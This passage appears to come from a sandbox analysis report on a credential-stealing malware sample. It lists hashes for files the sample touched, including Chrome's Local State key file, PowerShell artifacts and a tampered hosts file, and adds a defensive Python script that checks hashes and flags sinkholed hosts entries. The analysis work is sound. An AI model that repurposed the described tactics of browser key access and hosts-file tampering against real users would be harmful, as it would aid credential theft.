                                MD5      2acd65a11e21dbbb697d7aaef5d77232
                                SHA1     2436a734801f211cb95262d41b13a76319b17271
                                SHA256   e0e9ad581337cf23079f80c3d0d8caec17a11c13eba40bcabc48a17b7ccb105a
                                SHA512   b7dcd99518a92ff1c3abe9b49c1899d41e1e4fc78a209cf1081c63aff49b1ccc415fa3cead4c897b9bd3207218820976788543f63f0f5e8c3c5d2ba6237a0b19

                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
                                Filesize 234KB
                                MD5      bea4999790da462dc6a4574bf5142fc7
                                SHA1     90b06dcb1fa9e17e32ff4b0e8efe6ec7c6e60ff5
                                SHA256   6bfdc54cfefef3e37cc0d94a419236bed95ce190fa133b726d178822c32d32e9
                                SHA512   44b774fa004b1bfca10b59e423a740a5c4004118a2f7efcce4a63157f3cbb89a77659ed0bf8b8cd51121345bc83356eeafb594f459d28fea3b2103e0ee0f4d29

                              PowerShell start-up artifacts. The CLR usage log, the StartupProfileData-NonInteractive cache files and the __PSScriptPolicyTest_*.ps1 probe (PowerShell's AppLocker/WDAC lockdown-mode test, written to %TEMP% on every start) are created by powershell.exe itself; they corroborate the PowerShell executions but are not payload files.

                              • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
                                Filesize 2KB
                                MD5      d85ba6ff808d9e5444a4b369f5bc2730
                                SHA1     31aa9d96590fff6981b315e0b391b575e4c0804a
                                SHA256   84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
                                SHA512   8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                Filesize 1KB
                                MD5      ec79fae4e7c09310ebf4f2d85a33a638
                                SHA1     f2bdd995b12e65e7ed437d228f22223b59e76efb
                                SHA256   e9c4723a5fe34e081c3d2f548a1d472394cc7aa58056fcf44ca542061381243a
                                SHA512   af9dda12f6bb388d826fe03a4a8beed9bda23a978aa55a2af6a43271660ee896a7ee3bcf2c4d2f1e6180902791d8c23560f1c2ec097a501d8c6f4f6c49075625

                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                Filesize 944B
                                MD5      77d622bb1a5b250869a3238b9bc1402b
                                SHA1     d47f4003c2554b9dfc4c16f22460b331886b191b
                                SHA256   f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb
                                SHA512   d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                Filesize 948B
                                MD5      c9b6705519e1eef08f86c4ba5f4286f3
                                SHA1     6c6b179e452ecee2673a1d4fe128f1c06f70577f
                                SHA256   0f9cad44a79126871580e19b01dc3f880c5173b1faaf8b9018d5d1f829714705
                                SHA512   6d8f85a7a8b0b124530f36a157cd0441b5c1eacdc35e274af9fbf0569d03d1d5e468651a5b2425f0215c282ecfa7b1ffeaeeaf18612822f00bd14306d30640c7

                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                Filesize 1KB
                                MD5      276798eeb29a49dc6e199768bc9c2e71
                                SHA1     5fdc8ccb897ac2df7476fbb07517aca5b7a6205b
                                SHA256   cd0a1056e8f1b6cb5cb328532239d802f4e2aa8f8fcdc0fcb487684bd68e0dcc
                                SHA512   0d34fce64bbefc57d64fa6e03ca886952263d5f24df9c1c4cce6a1e8f5a47a9a21e9820f8d38caa7f7b43a52336ce00b738ea18419aaa7c788b72e04ce19e4f2

                              • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xaflg42c.kx0.ps1
                                Filesize 60B
                                MD5      d17fe0a3f47be24a6453e9ef58c94641
                                SHA1     6ab83620379fc69f80c0242105ddffd7d98d5d9d
                                SHA256   96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
                                SHA512   5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                              • C:\Windows\system32\drivers\etc\hosts
                                Written during the run (this is the "Drops file in Drivers directory" signature). A stock Windows 10 hosts file is under 1 KB, so a 2KB copy carries appended entries; the report records only the resulting file's size and hashes, not its contents, so the added mappings have to be recovered from the host itself.
                                Filesize 2KB
                                MD5      4028457913f9d08b06137643fe3e01bc
                                SHA1     a5cb3f12beaea8194a2d3d83a62bdb8d558f5f14
                                SHA256   289d433902418aaf62e7b96b215ece04fcbcef2457daf90f46837a4d5090da58
                                SHA512   c8e1eef90618341bbde885fd126ece2b1911ca99d20d82f62985869ba457553b4c2bf1e841fd06dacbf27275b3b0940e5a794e1b1db0fd56440a96592362c28b

                              Memory dumps (name format: memory/<pid>-<sequence>-<start>-<end>-memory.dmp; the size is the dumped range):

                              • memory/2300-54-0x0000028039BD0000-0x0000028039C46000-memory.dmp   Filesize 472KB
                              • memory/2300-89-0x0000028039CA0000-0x0000028039CAA000-memory.dmp   Filesize 40KB
                              • memory/2300-55-0x0000028039C50000-0x0000028039CA0000-memory.dmp   Filesize 320KB
                              • memory/2300-56-0x0000028039BA0000-0x0000028039BBE000-memory.dmp   Filesize 120KB
                              • memory/2300-0-0x00007FFA21443000-0x00007FFA21445000-memory.dmp    Filesize 8KB
                              • memory/2300-90-0x0000028039CD0000-0x0000028039CE2000-memory.dmp   Filesize 72KB
                              • memory/2300-111-0x00007FFA21440000-0x00007FFA21F01000-memory.dmp  Filesize 10.8MB
                              • memory/2300-2-0x00007FFA21440000-0x00007FFA21F01000-memory.dmp    Filesize 10.8MB
                              • memory/2300-1-0x000002801F490000-0x000002801F4D4000-memory.dmp    Filesize 272KB
                              • memory/3940-17-0x000002277F2B0000-0x000002277F2D2000-memory.dmp   Filesize 136KB
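Two checks an analyst would run against the file list above, written here as an added example (this is not tooling from the report, the sandbox, or the Umbral project). The first hashes a file's bytes and compares them with the MD5/SHA1/SHA256 a report row gives, shown on the 2-byte Chrome tmp file whose digests are those of the string "[]". The second is the check a responder wants for the modified hosts file: an exact SHA256 match against the value recorded above, plus an independent scan for entries that map non-local hostnames to a sinkhole address (0.0.0.0, 127.0.0.1 or ::1), which catches a hosts-file block without assuming which domains were added. The sample hosts content is constructed for the example (the report does not show the real file's contents) and its domains are RFC 2606 placeholders.

```python
"""
Artifact verification for the file list in this report (added example).

matches_report_row(): confirm a file on a host is the artifact a report row
describes by comparing whichever digests the row supplies.

audit_hosts(): hash-match a hosts file against the SHA256 recorded in the
report and, independently, flag sinkholed entries. The domains in
SAMPLE_HOSTS are constructed placeholders, not values from the report.
"""
import hashlib
import ipaddress

# SHA256 of C:\Windows\system32\drivers\etc\hosts as recorded in the report.
KNOWN_BAD_HOSTS_SHA256 = {
    "289d433902418aaf62e7b96b215ece04fcbcef2457daf90f46837a4d5090da58",
}

SINKHOLE_ADDRS = {"0.0.0.0", "127.0.0.1", "::1"}
# Names a hosts file legitimately maps to loopback.
LOCAL_NAMES = {"localhost", "localhost.localdomain", "broadcasthost",
               "ip6-localhost", "ip6-loopback"}


def hashes_of(data: bytes) -> dict:
    """MD5/SHA1/SHA256 hex digests, the three every report row carries."""
    return {name: hashlib.new(name, data).hexdigest()
            for name in ("md5", "sha1", "sha256")}


def matches_report_row(data: bytes, **expected: str) -> bool:
    """True when every digest passed as a keyword (md5=..., sha256=...) matches."""
    actual = hashes_of(data)
    return all(actual[name] == value.lower() for name, value in expected.items())


def parse_hosts(text: str) -> list:
    """Return (address, hostname, line_no) for each mapping; comments ignored."""
    mappings = []
    for line_no, raw in enumerate(text.splitlines(), start=1):
        line = raw.split("#", 1)[0].strip()   # drop whole-line and trailing comments
        if not line:
            continue
        fields = line.split()
        try:
            ipaddress.ip_address(fields[0])
        except ValueError:
            continue                           # first field is not an address: skip
        for hostname in fields[1:]:
            mappings.append((fields[0], hostname.lower(), line_no))
    return mappings


def audit_hosts(data: bytes) -> dict:
    """Hash check plus sinkhole-entry scan over raw hosts file bytes."""
    digest = hashlib.sha256(data).hexdigest()
    text = data.decode("utf-8", errors="replace")
    mappings = parse_hosts(text)
    sinkholed = [m for m in mappings
                 if m[0] in SINKHOLE_ADDRS and m[1] not in LOCAL_NAMES]
    return {
        "sha256": digest,
        "known_bad_hash": digest in KNOWN_BAD_HOSTS_SHA256,
        "mappings": len(mappings),
        "sinkholed": sinkholed,
        "suspicious": digest in KNOWN_BAD_HOSTS_SHA256 or bool(sinkholed),
    }


# Constructed sample: a stock-looking header followed by appended block entries.
SAMPLE_HOSTS = b"""# Copyright (c) 1993-2009 Microsoft Corp.
# localhost name resolution is handled within DNS itself.
#\t127.0.0.1       localhost
#\t::1             localhost

0.0.0.0 updates.example.com
0.0.0.0 telemetry.example.net   # constructed stand-in for a vendor domain
127.0.0.1 localhost
"""

if __name__ == "__main__":
    # The report's 2-byte tmp file: its MD5 is md5("[]").
    print(matches_report_row(b"[]", md5="d751713988987e9331980363e24189ce"))
    result = audit_hosts(SAMPLE_HOSTS)
    for addr, host, line_no in result["sinkholed"]:
        print(f"line {line_no}: {host} -> {addr}")
    print("suspicious:", result["suspicious"])
```

On a live Windows host, pass the bytes of C:\Windows\System32\drivers\etc\hosts to audit_hosts(); the hash match only fires on a byte-identical copy of the file the sandbox captured, so the sinkhole scan is the check that generalises to other victims of the same build.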
